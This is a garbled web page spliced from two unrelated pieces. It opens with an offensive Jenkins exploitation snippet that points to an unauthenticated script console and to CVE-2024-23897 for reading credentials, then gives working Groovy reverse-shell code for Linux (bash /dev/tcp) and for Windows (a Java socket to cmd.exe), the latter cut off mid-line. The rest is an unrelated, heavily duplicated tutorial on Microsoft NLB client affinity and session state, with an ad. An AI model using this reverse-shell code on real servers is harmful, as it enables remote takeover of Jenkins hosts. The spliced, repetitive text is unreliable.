Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
NLB is a software-based load balancer (Windows Feature) that resides on each member in the cluster. Load Balancing is based on number of client connection requests and the NLB algorithm does not dynamically respond to changes in the load on each cluster host (such as the CPU load or memory usage or Network Usage).
Thus, If client population is less and/or the connections produce varying loads on the server, the load balancing algorithm of Microsoft NLB is less effective.
Udacity has special offers worldwide to help anyone learn important, higher-paying job skills during this challenging time. Click here to get your offer and start learning now!
Thus, If client population is less and/or the connections produce varying loads on the server, the load balancing algorithm of Microsoft NLB is less effective.
Udacity has special offers worldwide to help anyone learn important, higher-paying job skills during this challenging time. Click here to get your offer and start learning now!
To understand how NLB preserve the session state, first let me take you through the difference between a stateful and stateless connections:
Stateless
The application connection is said to be stateless if the server does not store any state about the client session instead the session data is saved at th client side. The server does not rely on information from earlier request.
** HTTP is a stateless connection as no session data is preserved.
** Cookies and other software’s/Addons are capable of storing session information about client and can be used with HTTP to make the connection stateful.
Stateless
The application connection is said to be stateless if the server does not store any state about the client session instead the session data is saved at th client side. The server does not rely on information from earlier request.
** HTTP is a stateless connection as no session data is preserved.
** Cookies and other software’s/Addons are capable of storing session information about client and can be used with HTTP to make the connection stateful.
Note: Stateless Interactions- There is no impact/connection loss if the request is processed by different servers.
Stateful
The application connection is said to be stateful if the server store session state and data about the client session. Server rely on previous connection information (session) while processing the new connections requests.
Note: Stateful Interactions- There will be impact/connection loss if the request is processed by a different server after a session break and if the client session data is not shared between the servers.
Stateful
The application connection is said to be stateful if the server store session state and data about the client session. Server rely on previous connection information (session) while processing the new connections requests.
Note: Stateful Interactions- There will be impact/connection loss if the request is processed by a different server after a session break and if the client session data is not shared between the servers.
Managing Application/Session State
Session state refers to client data that is visible to a particular client during the session duration. The server application containing the client state information must share the same with other hosts in the same cluster to prevent errors.
When an application maintains the state information of the client connection, it’s important to direct all TCP/UDP connections to the same cluster host processing the request.
In terms of application data, the data changes to the data store must be synchronized across multiple hosts in the cluster. One example is to use a backend database that is shared by all the instance of application residing across multiple cluster hosts.
When an application maintains the state information of the client connection, it’s important to direct all TCP/UDP connections to the same cluster host processing the request.
In terms of application data, the data changes to the data store must be synchronized across multiple hosts in the cluster. One example is to use a backend database that is shared by all the instance of application residing across multiple cluster hosts.
To Maintain the Session State Microsoft NLB uses the Affinity Rule Options to direct all connections from a given client address or class of client addresses to the same cluster host.
Note: Client/server applications that embed session state within “cookies” or push it to a back-end database do not need client affinity to be maintained.
Note: Client/server applications that embed session state within “cookies” or push it to a back-end database do not need client affinity to be maintained.
Client Affinity
NLB Offers three types of affinity configurations to preserve the session state namely; None, Single and Network (Class C).
1. None (No Affinity)
With this cluster option, no affinity rules are defined and client connections from any source can access any member host in the cluster. Useful for applications which does not need to store session information.
With this cluster option, no affinity rules are defined and client connections from any source can access any member host in the cluster. Useful for applications which does not need to store session information.
2. Single
With this option NLB maps the clients to a specific host in the cluster based on the client’s Full IP Address. Once connection is established, the requests coming from the same client IP address always reach the same member server in the cluster.
Useful for Intranet Applications, as the clients in intranet have IP address within a narrow range. If used for Internet Applications, NLB becomes not efficient as it can span a broad IP range and also more computing overhead to the distributing algorithm.
With this option NLB maps the clients to a specific host in the cluster based on the client’s Full IP Address. Once connection is established, the requests coming from the same client IP address always reach the same member server in the cluster.
Useful for Intranet Applications, as the clients in intranet have IP address within a narrow range. If used for Internet Applications, NLB becomes not efficient as it can span a broad IP range and also more computing overhead to the distributing algorithm.
3. Network (Class C)
With this option NLB associates clients to a specific host in the cluster based on the Class C {(192.0.0.1 to 223.255.255.254) /24} portion of the client IP Address. The connection from the same Class C address range always access the same member server in the cluster. This is best suited for cluster serving Internet applications.
Extended Affinity Option:
This is only available for Single and Class C Affinity options and is achieved by setting a timeout value in the filtering options. This timeout indicates that when a connection is lost/Interrupted, the cluster host keeps the client data for the specified duration of time so that if the client reconnects within the timeout duration, the client preferences/selections are still preserved.
Ex: Customer using an online shopping with products selected in the shopping cart, if the customer loss the connection and reconnects (Either due to client side issue or due to application side issue), the client can still see the selected products in the cart if the timeout value is defined.
With this option NLB associates clients to a specific host in the cluster based on the Class C {(192.0.0.1 to 223.255.255.254) /24} portion of the client IP Address. The connection from the same Class C address range always access the same member server in the cluster. This is best suited for cluster serving Internet applications.
Extended Affinity Option:
This is only available for Single and Class C Affinity options and is achieved by setting a timeout value in the filtering options. This timeout indicates that when a connection is lost/Interrupted, the cluster host keeps the client data for the specified duration of time so that if the client reconnects within the timeout duration, the client preferences/selections are still preserved.
Ex: Customer using an online shopping with products selected in the shopping cart, if the customer loss the connection and reconnects (Either due to client side issue or due to application side issue), the client can still see the selected products in the cart if the timeout value is defined.
---------------------------------------------------------------------------------------------------------------------------------
Article Author :-
Mr.Arjun Sunil
6+ year of experience in Windows Servers, Cloud & Virtualization.
Follow Arjun Sunil at his LinkedIn Here.
---------------------------------------------------------------------------------------------------------------------------------